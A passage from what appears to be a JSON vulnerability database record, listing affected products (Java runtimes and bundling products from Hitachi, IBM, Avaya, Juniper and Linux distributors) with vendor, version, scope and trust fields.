"vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus primary server base 06-50-/f", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "jre 1.5.0.0 08", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "ucosminexus client for plug-in )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "jre 1.5.0 45", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0.0 12", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus client )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus application server enterprise", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-51" }, { "model": "jdk", "scope": "eq", "trust": 0.6, "vendor": "oracle", "version": "1.8" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus primary server base", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-02" }, { "model": "cosminexus application server", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "05-00" }, { "model": "jdk 1.5.0.0 09", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "cosminexus developer professional )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-50" }, { "model": "ucosminexus developer standard", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-71" }, { "model": "cosminexus client 06-50-/f", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "ucosminexus service platform messaging )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "-08-50" }, { "model": "cosminexus application server enterprise 06-00-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "jdk 1.5.0.0 11", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 11-b03", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "cosminexus developer professional )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus application server enterprise )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-50" }, { "model": "cosminexus application server standard )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-50" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus client 06-50-/c", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "jre 1.5.0.0 07", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 01", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 20", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "ucosminexus application server light (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.30" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0107-10" }, { "model": "sterling secure proxy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.0" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.17" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.2" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1.0" }, { "model": "junos space ja1500 appliance", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.5" }, { "model": "cosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-02" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.47" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "content collector for sap applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0.1" }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "cosminexus application server standard 06-50-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.10" }, { "model": "cosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-50" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0" }, { "model": "cosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-51" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.43" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "cosminexus application server enterprise 06-02-/g", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "cosminexus application server 05-00-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-72" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "db2 accessories suite", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "cosminexus application server enterprise 06-02-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1" }, { "model": "jrockit r28.3.1", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "tivoli system automation for multiplatforms", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "ucosminexus developer (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0108-00" }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.35" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.39" }, { "model": "ucosminexus operator", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2" }, { "model": "ims explorer for development", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "ucosminexus client for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus application server enterprise 06-71-/m", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.14" }, { "model": "ucosminexus primary server base", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus operator (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "security access manager for web appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0.1" }, { "model": "jdk 1.5.0 11", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "ucosminexus developer standard 06-71-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer professional for plug-in (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "tivoli netcool configuration manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "tivoli key lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "jrockit r28.0.0", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "runtimes for java technology 7r1 sr1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "ucosminexus operator", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-50" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.16" }, { "model": "jdk 1.5.0.0 06", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.4" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.03" }, { "model": "cosminexus developer professional 06-50-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.2" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.09" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "db2 accessories suite", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "jrockit r28.1.1", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus client 06-51-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ts7740 virtualization engine", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3957-v06" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.3" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.08" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.3" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "cosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-51" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.04" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.15" }, { "model": "cosminexus client 06-02-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus studio", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "05-02" }, { "model": "enterprise linux server supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "rational developer for i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.01" }, { "model": "ucosminexus primary server base (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus developer standard 06-71-/m", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.071" }, { "model": "jdk 1.5.0 11-b03", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "web sphere real time service refresh", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "36" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "tivoli system automation for multiplatforms", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "cosminexus developer light 06-00-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server standard 06-02-/g", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0108-20" }, { "model": "enterprise linux workstation supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "cosminexus application server enterprise 06-50-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "linux enterprise desktop sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "network and security manager software r4", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "cosminexus developer 05-02-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "sterling secure proxy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.1.6" }, { "model": "ucosminexus client for plug-in", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.16" }, { "model": "rational developer for aix and linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.01" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.6.0" }, { "model": "sterling secure proxy ifix04", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.0.6" }, { "model": "cosminexus application server enterprise 06-51-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "ucosminexus application server express", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "aura experience portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "ucosminexus client 06-70-/p", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.5" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-02" }, { "model": "linux enterprise server sp4 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.1" }, { "model": "ims explorer for development", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.1.1.0" }, { "model": "tpf toolkit", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus application server standard 06-70-/p", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.2" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.115" }, { "model": "ucosminexus developer standard 06-70-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server standard-r", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cosminexus primary server base 06-51-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "rational developer for i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "tpf toolkit", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.6.1" }, { "model": "ucosminexus client 06-70-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jre 1.5.0 08", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "tivoli system automation for multiplatforms", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "cosminexus application server standard 06-02-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer 05-05-/r", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.4" }, { "model": "messaging application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2" }, { "model": "ucosminexus primary server base", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-60" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "ucosminexus application server express", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus application server enterprise 06-70-/a (windows(ip", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.37" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "tivoli provisioning manager for software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "ucosminexus application server smart edition )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "network and security manager software r6", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "jrockit r27.8.1", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus developer professional 06-51-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere ilog jrules", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0" }, { "model": "rational developer for aix and linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "ucosminexus developer professional for plug-in", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cms r17ac.g", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "cosminexus client 06-51-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-51" }, { "model": "cosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-00" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.1" }, { "model": "sterling secure proxy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.0.6" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.3.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.24" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.010" }, { "model": "sterling secure proxy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.3.01" }, { "model": "ucosminexus client (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "tivoli provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "ucosminexus application server enterprise 06-70-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server enterprise 06-00-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cms r17ac.h", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "ucosminexus client for plug-in", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.0" }, { "model": "cosminexus studio 05-00-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "ucosminexus operator )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "network and security manager software r3", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "sterling external authentication server ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.1.802" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.18" }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "cosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-02" }, { "model": "cosminexus studio 05-05-/o", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.4" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.10" }, { "model": "nsm3000", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "ucosminexus developer professional", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "jrockit r27.6.0-50", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.5.015" }, { "model": "sterling secure proxy patch ifix04", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.3.123" }, { "model": "sterling external authentication server ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0.404" }, { "model": "cosminexus application server 05-02-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-50" }, { "model": "jdk 01", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.6" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.43" }, { "model": "cosminexus studio 05-01-/l", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.13" }, { "model": "rational sap connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.2" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.31" }, { "model": "ucosminexus developer professional for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "jrockit r27.6.5", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus client 06-02-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "linux enterprise software development kit sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "ucosminexus application server enterprise (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "cics transaction gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "network and security manager software", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2-" }, { "model": "junos space ja2500 appliance", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "enterprise linux server eus 6.5.z", "scope": null, "trust": 0.3, "vendor": "redhat", "version": null }, { "model": "linux enterprise server sp2 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1" }, { "model": "ucosminexus developer standard 06-70-/q", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "ucosminexus service platform messaging", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-07-10" }, { "model": "websphere sensor events", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "tpf toolkit", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.3" }, { "model": "ucosminexus client for plug-in (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus service platform messaging )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-09-50" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.10" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "ucosminexus application server standard-r (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "tpf toolkit", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.6" }, { "model": 